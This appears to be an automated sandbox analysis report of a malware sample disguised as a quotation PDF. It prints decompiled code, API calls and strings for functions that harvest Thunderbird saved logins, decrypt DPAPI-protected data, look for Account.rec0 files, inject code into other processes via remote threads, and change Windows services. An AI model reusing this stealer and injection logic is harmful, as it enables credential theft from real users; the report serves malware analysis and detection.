0x00415b86
0x00415b94
0x00415b9f
0x00415bb4
0x00415bc9
0x00415be2
0x00415bf0
0x00415bfb
0x00415c10
0x00415c25
0x00415c3e
0x00415c4c
0x00415c57
0x00415c6f
0x00415c87
0x00415ca2
0x00415cad
0x00415cc3
0x00415ce2
0x00415ced
0x00415cf8
0x00415d0e
0x00415d2d
0x00415d38
0x00415d43
0x00415d48
0x00415d55
0x00415d5b
0x00415d67
0x00415d72
0x00415d7b
0x00415d81
0x00415d89
0x00415d91
0x00415d9c
0x00415d9c
0x00415daa
0x00415daf
0x00415db0
0x00415db2
0x00415dbb
0x00415dc0
0x00415dc5
0x00415dcf
0x00415dd8
0x00415de2
0x00415deb
0x00415df6
0x00415dfe
0x00415e06
0x00415e0e
0x00415e16
0x00415aab
0x00415ab1
0x00415ab9
0x00415ac1
0x00415ac9
0x00415ad1
0x00415ad1
0x00000000
0x00415aa9
0x004159f5
0x004159fd
0x00000000
0x004159fd
0x004159c3
0x004159cb
0x00000000
0x004159cb
0x0041599c
0x004159a4
0x004159a4
0x00415e23
0x00415e28
0x00415e35
0x00415e3d
0x00415e4d
0x00415e55
0x00000000
0x00415e5a
0x00415851
0x00415860
0x00000000
0x00000000
0x00415862
0x0041586c
0x0041587c
0x00415884
0x00000000

APIs

Part of subcall function 00406F64: lstrlenW.KERNEL32( B,00003000,00000000,?,004220E3,?), ref: 00406F73
Part of subcall function 00406F64: lstrlenW.KERNEL32(0000000A,004220E3,?), ref: 00406F8D
Part of subcall function 00406F64: lstrcpyW.KERNEL32 ref: 00406FAF

Part of subcall function 00417BC1: lstrcpyW.KERNEL32 ref: 00417BF3
Part of subcall function 00417BC1: lstrcatW.KERNEL32(?,00000001), ref: 00417C03
Part of subcall function 00417BC1: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000104), ref: 00417C1D
Part of subcall function 00417BC1: RegQueryValueExW.ADVAPI32(00000104,Path,00000000,00000001,?,0041580F), ref: 00417C3C
Part of subcall function 00417BC1: RegCloseKey.ADVAPI32(00000104), ref: 00417C45

GetBinaryTypeW.KERNEL32(?,00000000), ref: 0041582C

Part of subcall function 00406FBC: lstrcpyW.KERNEL32 ref: 00406FF9

Part of subcall function 00416D22: GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 00416D55
Part of subcall function 00416D22: SetCurrentDirectoryW.KERNEL32(00000000), ref: 00416D64

GetPrivateProfileStringW.KERNEL32 ref: 00415912

Part of subcall function 00416D22: LoadLibraryW.KERNEL32(00000000,.dll,0000005A,?,.dll,0000005A,?,msvcr,?,msvcp,?,softokn3.dll,?,mozglue.dll,?,msvcp120.dll), ref: 00416F07
Part of subcall function 00416D22: LoadLibraryW.KERNEL32(00000000), ref: 00416F1F
Part of subcall function 00416D22: LoadLibraryW.KERNEL32(00000000), ref: 00416F37
Part of subcall function 00416D22: LoadLibraryW.KERNEL32(00000000), ref: 00416F4F
Part of subcall function 00416D22: LoadLibraryW.KERNEL32(00000000), ref: 00416F67

Strings

\Thunderbird\, xrefs: 00415894
Profile, xrefs: 0041592C
encryptedUsername, xrefs: 00415B00
encryptedPassword, xrefs: 00415C00
hostname, xrefs: 00415B54
\logins.json, xrefs: 00415A13
Profile, xrefs: 004157B0
encryptedUsername, xrefs: 00415BA4
profiles.ini, xrefs: 004158AD
Path, xrefs: 0041590A
Profile, xrefs: 004158BA
thunderbird.exe, xrefs: 00415805
.tmp, xrefs: 00415A58

Memory Dump Source

Source File: 00000003.00000002.586825371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.586825371.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_order_of_quotationpdf.jbxd

Yara matches

Similarity

API ID: LibraryLoad$lstrcpy$CurrentDirectorylstrlen$BinaryCloseOpenPrivateProfileQueryStringTypeValuelstrcat
String ID: .tmp$Path$Profile$Profile$Profile$\Thunderbird\$\logins.json$encryptedPassword$encryptedUsername$encryptedUsername$hostname$profiles.ini$thunderbird.exe
API String ID: 706928001-3731364201
Opcode ID: a4bac86b1c515883900f6e95f372fa523bf81d6d80044606d19f7de9359fc8c6
Instruction ID: 66c0f8747e68fb71eadc854c693a3b00775220fc858c9318e5bb75d412beb18a
Opcode Fuzzy Hash: a4bac86b1c515883900f6e95f372fa523bf81d6d80044606d19f7de9359fc8c6
Instruction Fuzzy Hash: 7B12E971D001299ADB14FBA1DC92FEEB778AF14304F5141AEE106B6091EF386B99CF58

Uniqueness

Uniqueness Score: -1.00%

Function 0041ACE9 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 77
serviceCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041ACE9(intOrPtr __ecx, void* __eflags, intOrPtr _a4) {
				void* _v8;
				void* _v12;
				long _v16;
				intOrPtr _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				char _v1060;

				_v20 = __ecx;
				_v8 = _v8 & 0x00000000;
				_v12 = _v12 & 0x00000000;
				_v24 = _v24 & 0x00000000;
				_v28 = _v28 & 0x00000000;
				_v32 = _v32 & 0x00000000;
				_v36 = _v36 & 0x00000000;
				E0040132F( &_v1060, 0, 0x400);
				_v8 = OpenSCManagerW(0, L"ServicesActive", 1);
				if(_v8 != 0) {
					_v12 = OpenServiceW(_v8, E00406F44(_a4), 0x10);
					if(_v12 != 0) {
						if(StartServiceW(_v12, 0, 0) != 0) {
							L10:
							CloseServiceHandle(_v8);
							CloseServiceHandle(_v12);
							return 1;
						}
						_v16 = GetLastError();
						if(_v16 != 0x420) {
							CloseServiceHandle(_v8);
							CloseServiceHandle(_v12);
							return 0;
						}
						Sleep(0x7d0);
						if(StartServiceW(_v12, 0, 0) != 0) {
							goto L10;
						}
						CloseServiceHandle(_v8);
						CloseServiceHandle(_v12);
						return 0;
					}
					CloseServiceHandle(_v8);
					return 0;
				}
				return 0;
			}

0x0041acf2
0x0041acf5
0x0041acf9
0x0041acfd
0x0041ad01
0x0041ad05
0x0041ad09
0x0041ad1b
0x0041ad32
0x0041ad39
0x0041ad56
0x0041ad5d
0x0041ad7e
0x0041addc
0x0041addf
0x0041ade8
0x00000000
0x0041adf0
0x0041ad86
0x0041ad90
0x0041adc9
0x0041add2
0x00000000
0x0041add8
0x0041ad97
0x0041adac
0x00000000
0x0041adc4
0x0041adb1
0x0041adba
0x00000000
0x0041adc0
0x0041ad62
0x00000000
0x0041ad68
0x00000000

APIs

OpenSCManagerW.ADVAPI32(00000000,ServicesActive,00000001), ref: 0041AD2C
OpenServiceW.ADVAPI32(00000000,00000000,00000010), ref: 0041AD50
CloseServiceHandle.ADVAPI32(00000000), ref: 0041AD62

Strings

ServicesActive, xrefs: 0041AD25

Memory Dump Source

Source File: 00000003.00000002.586825371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.586825371.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_order_of_quotationpdf.jbxd

Yara matches

Similarity

API ID: OpenService$CloseHandleManager
String ID: ServicesActive
API String ID: 4136619037-3071072050
Opcode ID: 2974671427033a48a4978efffe47a25fccc2f1d6c9720a881c456c8ae92e5659
Instruction ID: a780c9aed7072ed54e75f614109c9b6e4d6628d0cfa1f2dea298221e867576a5
Opcode Fuzzy Hash: 2974671427033a48a4978efffe47a25fccc2f1d6c9720a881c456c8ae92e5659
Instruction Fuzzy Hash: 55310F71A00608FFDF209FA0EC09B9EBAB1BF04316F514465F102B51A0D7794A92AF19

Uniqueness

Uniqueness Score: -1.00%

Function 0040D54A Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 105networkCOMMON

Download Yara Rule

APIs

getaddrinfo.WS2_32(004268D4,00000000,?,00000000), ref: 0040D5AD
socket.WS2_32(00000002,00000001,00000000), ref: 0040D5D4

Strings

microsoft.com, xrefs: 0040D58B
P, xrefs: 0040D592
d, xrefs: 0040D55D
GET http://microsoft.com/ HTTP/1.1Host: microsoft.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Langu, xrefs: 0040D599
pREw, xrefs: 0040D5AD

Memory Dump Source

Source File: 00000003.00000002.586825371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.586825371.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_order_of_quotationpdf.jbxd

Yara matches

Similarity

API ID: getaddrinfosocket
String ID: GET http://microsoft.com/ HTTP/1.1Host: microsoft.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Langu$P$d$microsoft.com$pREw
API String ID: 1630306000-2791872150
Opcode ID: f28a59de3cc6b2689dc49e8fa1d8d8847bea71efbb12c2a88f340bdbafe6dabc
Instruction ID: 480fff08760bc5be9ef27a9555a2922dea902db104e9ed2c9d2611cf0f813ee3
Opcode Fuzzy Hash: f28a59de3cc6b2689dc49e8fa1d8d8847bea71efbb12c2a88f340bdbafe6dabc
Instruction Fuzzy Hash: 63411671E00208EFEB10DFE4DD49BEDBBB1BB04315F20816AE911BA1E0D7B55A459B58

Uniqueness

Uniqueness Score: -1.00%

Function 004115FB Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 129
memoryinjectionCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004115FB(void* _a4, long _a8, char _a12) {
				void* _v5;
				char _v6;
				char _v7;
				void* _v12;
				intOrPtr* _v16;
				void* _v20;
				void* _v24;
				void* _v28;
				long _v32;
				void* _v36;
				long _v40;
				long _v44;
				long _v48;
				intOrPtr _v52;
				long _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				_Unknown_base(*)()* _v68;
				signed int _t69;
				void* _t83;
				void* _t94;
				void* _t98;
				void* _t99;

				if(( *0x42cc8c & 0x000000ff) == 0) {
					if(E00412315() == 0) {
						_v5 = 0;
					} else {
						_v5 = 1;
					}
					 *0x42cc8c = _v5;
				}
				_t4 =  &_a12; // 0x405745
				_t69 = OpenProcess(0x1fffff, 0,  *_t4);
				_v12 = _t69;
				if(_v12 != 0) {
					_v32 = 0x100000;
					_v24 = VirtualAllocEx(_v12, 0, _v32, 0x3000, 0x40);
					if(_v24 != 0) {
						_v48 = _v48 & 0x00000000;
						VirtualProtectEx(_v12, _v24, _v32, 0x40,  &_v48);
						_v36 = VirtualAllocEx(_v12, 0x33370000, 0x100, 0x3000, 0x40);
						if(_v36 != 0) {
							_v40 = _v40 & 0x00000000;
							_v28 = "XXXXXX";
							_v16 = _v28;
							_v52 = _v16 + 1;
							do {
								_v6 =  *_v16;
								_v16 = _v16 + 1;
							} while (_v6 != 0);
							_v56 = _v16 - _v52;
							if(WriteProcessMemory(_v12, _v36, _v28, _v56,  &_v40) == 0) {
								L17:
								_t83 = 0xfffffffd;
								return _t83;
							}
							_v20 = _v28;
							_v60 = _v20 + 1;
							do {
								_v7 =  *_v20;
								_v20 = _v20 + 1;
							} while (_v7 != 0);
							_v64 = _v20 - _v60;
							if(_v40 == _v64) {
								_v44 = _v44 & 0x00000000;
								if(WriteProcessMemory(_v12, _v24, _a4, _a8,  &_v44) == 0 || _v44 != _a8) {
									_t94 = 0xfffffffd;
									return _t94;
								} else {
									_v68 = _v24;
									return CreateRemoteThread(_v12, 0, 0, _v68, 0, 0, 0);
								}
							}
							goto L17;
						}
						_t98 = 0xfffffffe;
						return _t98;
					}
					_t99 = 0xfffffffe;
					return _t99;
				} else {
					return _t69 | 0xffffffff;
				}
			}

0x0041160a
0x00411613
0x0041161b
0x00411615
0x00411615
0x00411615
0x00411622
0x00411622
0x00411627
0x00411631
0x00411637
0x0041163e
0x00411648
0x00411664
0x0041166b
0x00411675
0x00411688
0x004116a8
0x004116af
0x004116b9
0x004116bd
0x004116c7
0x004116ce
0x004116d1
0x004116d6
0x004116d9
0x004116dc
0x004116e8
0x00411703
0x00411734
0x00411736
0x00000000
0x00411736
0x00411708
0x0041170f
0x00411712
0x00411717
0x0041171a
0x0041171d
0x00411729
0x00411732
0x00411739
0x00411755
0x00411761
0x00000000
0x00411764
0x00411767
0x00000000
0x0041177a
0x00411755
0x00000000
0x00411732
0x004116b3
0x00000000
0x004116b3
0x0041166f
0x00000000
0x00411640
0x00000000
0x00411640

APIs

OpenProcess.KERNEL32(001FFFFF,00000000,EW@,?,?,?,?,?,?,?,?,?,?,?,?,00405745), ref: 00411631

Part of subcall function 00412315: GetCurrentProcess.KERNEL32(0042CC94,?,00411611,?,?,?,?,?,?,?,?,?,?,?,?,00405745), ref: 0041231D
Part of subcall function 00412315: IsWow64Process.KERNEL32(00000000,?,00411611,?,?,?,?,?,?,?,?,?,?,?,?,00405745), ref: 00412324
Part of subcall function 00412315: GetProcessHeap.KERNEL32(?,00411611,?,?,?,?,?,?,?,?,?,?,?,?,00405745,?), ref: 0041232A

VirtualAllocEx.KERNEL32(00000000,00000000,00100000,00003000,00000040), ref: 0041165E
VirtualProtectEx.KERNEL32(00000000,00000000,00100000,00000040,00000000), ref: 00411688
VirtualAllocEx.KERNEL32(00000000,33370000,00000100,00003000,00000040), ref: 004116A2
WriteProcessMemory.KERNEL32(00000000,00000000,00426A78,?,00000000), ref: 004116FB

Strings

EW@, xrefs: 00411627
XXXXXX, xrefs: 004116BD

Memory Dump Source

Source File: 00000003.00000002.586825371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.586825371.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_order_of_quotationpdf.jbxd

Yara matches

Similarity

API ID: Process$Virtual$Alloc$CurrentHeapMemoryOpenProtectWow64Write
String ID: EW@$XXXXXX
API String ID: 292641398-205459200
Opcode ID: 1600b072810323f19ff6a40c38f3f8caa54f32f10250fa82c4bc47d0dd84adc3
Instruction ID: dd2ddd2b8cae3f4cabb2fbd82498cf7a2f8e6611a58cde40ae61ac48b93846f8
Opcode Fuzzy Hash: 1600b072810323f19ff6a40c38f3f8caa54f32f10250fa82c4bc47d0dd84adc3
Instruction Fuzzy Hash: 72510571D04249FFDF11CFA4CD45BEEBFB1AB08310F244156E621B62A0C7799A85EB68

Uniqueness

Uniqueness Score: -1.00%

Function 0041AC18 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 66
serviceCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041AC18(intOrPtr __ecx, void* __eflags, intOrPtr _a4, int _a8) {
				void* _v8;
				void* _v12;
				intOrPtr _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				char _v1056;

				_v16 = __ecx;
				_v8 = _v8 & 0x00000000;
				_v12 = _v12 & 0x00000000;
				_v20 = _v20 & 0x00000000;
				_v24 = _v24 & 0x00000000;
				_v28 = _v28 & 0x00000000;
				_v32 = _v32 & 0x00000000;
				E0040132F( &_v1056, 0, 0x400);
				_v8 = OpenSCManagerW(0, L"ServicesActive", 1);
				if(_v8 != 0) {
					_v12 = OpenServiceW(_v8, E00406F44(_a4), 2);
					if(_v12 != 0) {
						if(ChangeServiceConfigW(_v12, 0xffffffff, _a8, 0xffffffff, 0, 0, 0, 0, 0, 0, 0) != 0) {
							CloseServiceHandle(_v8);
							CloseServiceHandle(_v12);
							return 1;
						}
						CloseServiceHandle(_v8);
						CloseServiceHandle(_v12);
						return 0;
					}
					CloseServiceHandle(_v8);
					return 0;
				}
				return 0;
			}

0x0041ac21
0x0041ac24
0x0041ac28
0x0041ac2c
0x0041ac30
0x0041ac34
0x0041ac38
0x0041ac4a
0x0041ac61
0x0041ac68
0x0041ac82
0x0041ac89
0x0041acb8
0x0041acd3
0x0041acdc
0x00000000
0x0041ace4
0x0041acbd
0x0041acc6
0x00000000
0x0041accc
0x0041ac8e
0x00000000
0x0041ac94
0x00000000

APIs

OpenSCManagerW.ADVAPI32(00000000,ServicesActive,00000001), ref: 0041AC5B
OpenServiceW.ADVAPI32(00000000,00000000,00000002), ref: 0041AC7C
CloseServiceHandle.ADVAPI32(00000000), ref: 0041AC8E

Strings

ServicesActive, xrefs: 0041AC54

Memory Dump Source

Source File: 00000003.00000002.586825371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.586825371.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_order_of_quotationpdf.jbxd

Yara matches

Similarity

API ID: OpenService$CloseHandleManager
String ID: ServicesActive
API String ID: 4136619037-3071072050
Opcode ID: 70f5ee01c0a9b89819bf6bb08fe6ef44ed00e9fee2df1e563cb5c8cbb3acb4ba
Instruction ID: 6035fa289eca29dee1ed75c991b22344d525c51f1c46963e2b5f06cba7ea3c54
Opcode Fuzzy Hash: 70f5ee01c0a9b89819bf6bb08fe6ef44ed00e9fee2df1e563cb5c8cbb3acb4ba
Instruction Fuzzy Hash: 69215C71E50208FFDF10DFA0CD09B9DBBB0BB14326F618465E112B51E0E7790A95AF59

Uniqueness

Uniqueness Score: -1.00%

Function 00422385 Relevance: 13.6, APIs: 9, Instructions: 85
injectionmemorythreadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00422385(void* _a4, long _a8) {
				char _v5;
				void* _v12;
				char* _v16;
				CHAR* _v20;
				void* _v24;
				CHAR* _v28;
				void* _v32;
				intOrPtr _v36;
				long _v40;
				char _v296;
				void _v300;
				void* _t60;

				_v12 = OpenProcess(0x1fffff, 0, _a8);
				_v300 = GetCurrentProcessId();
				_v28 = E00401000(0xff);
				GetModuleFileNameA(0, _v28, 0xff);
				_v20 = _v28;
				_v16 =  &_v296;
				_v36 = _v16;
				do {
					_v5 =  *_v20;
					 *_v16 = _v5;
					_v20 =  &(_v20[1]);
					_v16 = _v16 + 1;
				} while (_v5 != 0);
				_v24 = VirtualAllocEx(_v12, 0, 0x800, 0x3000, 0x40);
				WriteProcessMemory(_v12, _v24, _a4, 0x800, 0);
				VirtualProtectEx(_v12, _v24, 0x800, 0x40,  &_v40);
				_v32 = VirtualAllocEx(_v12, 0, 0x103, 0x3000, 4);
				WriteProcessMemory(_v12, _v32,  &_v300, 0x103, 0);
				_t60 = CreateRemoteThread(_v12, 0, 0, _v24 + 0x10e, _v32, 0, 0);
				 *0x560608 = _t60;
				return _t60;
			}

0x0042239e
0x004223a7
0x004223b8
0x004223c5
0x004223ce
0x004223d7
0x004223dd
0x004223e0
0x004223e5
0x004223ee
0x004223f4
0x004223fb
0x004223fe
0x0042241b
0x0042242e
0x00422445
0x00422462
0x00422479
0x00422496
0x0042249c
0x004224a2

APIs

OpenProcess.KERNEL32(001FFFFF,00000000,00000000), ref: 00422398
GetCurrentProcessId.KERNEL32 ref: 004223A1

Part of subcall function 00401000: GetProcessHeap.KERNEL32(00000000,02800000,0042212F,02800000,?,?,00424121,?,00000000), ref: 00401006
Part of subcall function 00401000: RtlAllocateHeap.NTDLL(00000000,?,?,00424121,?,00000000), ref: 0040100D

GetModuleFileNameA.KERNEL32(00000000,?,000000FF), ref: 004223C5
VirtualAllocEx.KERNEL32(?,00000000,00000800,00003000,00000040), ref: 00422415
WriteProcessMemory.KERNEL32(?,0042237F,?,00000800,00000000), ref: 0042242E
VirtualProtectEx.KERNEL32(?,0042237F,00000800,00000040,?), ref: 00422445
VirtualAllocEx.KERNEL32(?,00000000,00000103,00003000,00000004), ref: 0042245C
WriteProcessMemory.KERNEL32(?,?,?,00000103,00000000), ref: 00422479
CreateRemoteThread.KERNEL32(?,00000000,00000000,00422271,?,00000000,00000000), ref: 00422496

Memory Dump Source

Source File: 00000003.00000002.586825371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.586825371.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_order_of_quotationpdf.jbxd

Yara matches

Similarity

API ID: Process$Virtual$AllocHeapMemoryWrite$AllocateCreateCurrentFileModuleNameOpenProtectRemoteThread
String ID:
API String ID: 900395357-0
Opcode ID: 5df8db5278d4fe0ebbbd489e2a54b0e29269f040205826267c78045e86224b60
Instruction ID: 09753358facc657b0baa7268521a92c9ac8c5e19fee3ca764625b8fbd70ed073
Opcode Fuzzy Hash: 5df8db5278d4fe0ebbbd489e2a54b0e29269f040205826267c78045e86224b60
Instruction Fuzzy Hash: E231E575E40249BFEB21CFA4DC46BEDBFB4EB08700F1040A1FA55B62A0C7B16A559F58

Uniqueness

Uniqueness Score: -1.00%

Function 004156D1 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 71
stringmemoryencryptionCOMMON

Download Yara Rule

C-Code - Quality: 61%

			E004156D1(void* __ecx, void* __eflags, intOrPtr _a4, WCHAR* _a8, char _a12) {
				intOrPtr _v8;
				signed int _v12;
				signed int _v16;
				char _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				short _v8228;
				char* _t48;
				void* _t70;

				E004012A0(0x2020, __ecx);
				_t1 =  &_a12; // 0x41567a
				_v20 = GlobalAlloc(0x40,  *_t1 - 1);
				_v8 = 1;
				while(1) {
					_t7 =  &_a12; // 0x41567a
					if(_v8 >=  *_t7) {
						break;
					}
					_t8 =  &_v20; // 0x41567a
					 *((char*)( *_t8 + _v8 - 1)) =  *((intOrPtr*)(_a4 + _v8));
					_v8 = _v8 + 1;
				}
				_t13 =  &_a12; // 0x41567a
				_v28 =  *_t13 - 1;
				_t15 =  &_v20; // 0x41567a
				_v24 =  *_t15;
				_t48 =  &_v28;
				__imp__CryptUnprotectData(_t48, 0, 0, 0, 0, 0,  &_v36);
				if(_t48 == 0) {
					return lstrcpyW(_a8, L"Could not decrypt");
				}
				_v16 = _v16 & 0x00000000;
				_v12 = _v12 & 0x00000000;
				while(1) {
					_t26 =  &_a12; // 0x41567a
					if(_v12 >=  *_t26) {
						break;
					}
					 *(_t70 + _v16 * 2 - 0x2020) =  *(_v32 + _v12) & 0x000000ff;
					_v16 = _v16 + 1;
					_v12 = _v12 + 2;
				}
				return lstrcpyW(_a8,  &_v8228);
			}

0x004156d9
0x004156de
0x004156eb
0x004156ee
0x004156fe
0x00415701
0x00415704
0x00000000
0x00000000
0x00415706
0x00415714
0x004156fb
0x004156fb
0x00415719
0x0041571d
0x00415720
0x00415723
0x00415734
0x00415738
0x00415740
0x00000000
0x00415794
0x00415742
0x00415746
0x00415754
0x00415757
0x0041575a
0x00000000
0x00000000
0x00415769
0x00415775
0x00415751
0x00415751
0x00000000

APIs

GlobalAlloc.KERNEL32(00000040,zVA,?,0041567A,?,?,00001000), ref: 004156E5
CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00415738
lstrcpyW.KERNEL32 ref: 00415784
lstrcpyW.KERNEL32 ref: 00415794

Strings

zVA, xrefs: 004156DE, 00415701, 00415719, 00415757, 004156E2
zVA, xrefs: 00415720, 00415706
Could not decrypt, xrefs: 0041578C

Memory Dump Source

Source File: 00000003.00000002.586825371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.586825371.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_order_of_quotationpdf.jbxd

Yara matches

Similarity

API ID: lstrcpy$AllocCryptDataGlobalUnprotect
String ID: Could not decrypt$zVA$zVA
API String ID: 1995975691-2546633383
Opcode ID: 3994a824f6de0a4662ac2511a9c4a2a84da886fe8ef156e1fd2514e313b59ebc
Instruction ID: b759056a9d5f5c17bd3a74605e10087c16fb86ea6adf28617d4ff18c5f2cfa51
Opcode Fuzzy Hash: 3994a824f6de0a4662ac2511a9c4a2a84da886fe8ef156e1fd2514e313b59ebc
Instruction Fuzzy Hash: FB21E270A00649EFCB41CF98D885AEDBBB4FF08304F20409AE425E7250C738AA45DB54

Uniqueness

Uniqueness Score: -1.00%

Function 004147CA Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 60
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004147CA(intOrPtr __ecx, CHAR* _a4) {
				void* _v8;
				intOrPtr _v12;
				char _v272;
				struct _WIN32_FIND_DATAA _v592;
				char _v852;
				char _v1112;
				void* _t51;

				_v12 = __ecx;
				_v8 = _v8 | 0xffffffff;
				GetFullPathNameA(_a4, 0x104,  &_v852, 0);
				PathCombineA( &_v1112,  &_v852, "*");
				_v8 = FindFirstFileA( &_v1112,  &_v592);
				if(_v8 != 0xffffffff) {
					do {
						if((_v592.dwFileAttributes | 0x00000010) == 0x10 &&  *((char*)(_t51 + 0xfffffffffffffde0)) != 0x2e) {
							PathCombineA( &_v272, _a4,  &(_v592.cFileName));
							PathCombineA( &_v272,  &_v272, "Accounts\\Account.rec0");
							E004142D7(_v12,  &_v272);
						}
					} while (FindNextFileA(_v8,  &_v592) != 0);
				}
				return 0;
			}

0x004147d3
0x004147d6
0x004147eb
0x00414804
0x0041481e
0x00414825
0x00414827
0x00414833
0x00414859
0x00414872
0x00414882
0x00414882
0x00414897
0x00414827
0x0041489e

APIs

GetFullPathNameA.KERNEL32(?,00000104,?,00000000), ref: 004147EB
PathCombineA.SHLWAPI(?,?,00428D6C), ref: 00414804
FindFirstFileA.KERNEL32(?,?), ref: 00414818
PathCombineA.SHLWAPI(?,?,?), ref: 00414859
PathCombineA.SHLWAPI(?,?,Accounts\Account.rec0), ref: 00414872

Part of subcall function 004142D7: CreateFileA.KERNEL32(?,80000000,00000007,00000000,00000003,00000000,00000000), ref: 004142F2
Part of subcall function 004142D7: GetLastError.KERNEL32 ref: 00414301
Part of subcall function 004142D7: CloseHandle.KERNEL32(000000FF), ref: 0041430D

FindNextFileA.KERNEL32(000000FF,?), ref: 00414891

Strings

Accounts\Account.rec0, xrefs: 0041485F

Memory Dump Source

Source File: 00000003.00000002.586825371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.586825371.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_order_of_quotationpdf.jbxd

Yara matches

Similarity

API ID: Path$CombineFile$Find$CloseCreateErrorFirstFullHandleLastNameNext
String ID: Accounts\Account.rec0
API String ID: 3873318193-2660883932
Opcode ID: 4e981202a6b93ef7310c2481fc22ebd90946e9495d8c376cfd8ffa925ca01ce9
Instruction ID: 9c60bffeb506e78447e57f2d8f4c866237a6ed499a16afaebf3b015f809aa20e
Opcode Fuzzy Hash: 4e981202a6b93ef7310c2481fc22ebd90946e9495d8c376cfd8ffa925ca01ce9
Instruction Fuzzy Hash: 6A214DB1A0015DABDF20EBA4DC89AEE77BCBB04305F5045E6E149E2091D7349B858F64

Uniqueness

Uniqueness Score: -1.00%

Function 004218D5 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E004218D5(void* __ecx, void* __eflags) {
				struct HINSTANCE__* _v8;
				struct HRSRC__* _v12;
				void* _v16;
				void* _v20;
				long _v24;
				long _t15;
				void* _t26;

				E0040132F(0x5601f8, 0, 0x208);
				_t15 = GetModuleFileNameW(0, 0x5601f8, 0x208);
				__imp__#680();
				if(_t15 == 0 && E0041E932() != 1) {
					E00421853(0x5601f8);
					_pop(_t26);
					_v8 = E00422080(_t26);
					_v12 = FindResourceW(_v8, 0x66, L"WM_DSP");
					_v20 = LoadResource(_v8, _v12);
					_v24 = SizeofResource(_v8, _v12);
					_v16 = LockResource(_v20);
					if(_v16 != 0) {
						E00421799(_v16);
					}
				}
				return 0;
			}

0x004218e7
0x004218fb
0x00421901
0x00421909
0x0042191a
0x0042191f
0x00421925
0x00421938
0x00421947
0x00421956
0x00421962
0x00421969
0x0042196e
0x00421973
0x00421969
0x00421977

APIs

GetModuleFileNameW.KERNEL32(00000000,005601F8,00000208,?,?,?,?,?,0040A3BA,?,?), ref: 004218FB
IsUserAnAdmin.SHELL32 ref: 00421901

Part of subcall function 0041E932: GetCurrentProcess.KERNEL32(00000008,00000000,00404873,?,dBB), ref: 0041E946
Part of subcall function 0041E932: OpenProcessToken.ADVAPI32(00000000,?,dBB), ref: 0041E94D
Part of subcall function 0041E932: GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000004,00000004,00000004), ref: 0041E96D
Part of subcall function 0041E932: FindCloseChangeNotification.KERNEL32(00000000,?,dBB), ref: 0041E986

Part of subcall function 00421853: RegOpenKeyExW.ADVAPI32(80000001,SOFTWARE\_rptls,00000000,000F003F,005601F8,?,?,0042191F,005601F8,?,?,?,?,?,0040A3BA,?), ref: 0042186E
Part of subcall function 00421853: RegCreateKeyExW.ADVAPI32(80000001,SOFTWARE\_rptls,00000000,00000000,00000000,000F003F,00000000,005601F8,?,?,?,0042191F,005601F8), ref: 00421897
Part of subcall function 00421853: lstrlenW.KERNEL32(0042191F,?,?,0042191F,005601F8,?,?,?,?,?,0040A3BA,?,?), ref: 004218A0
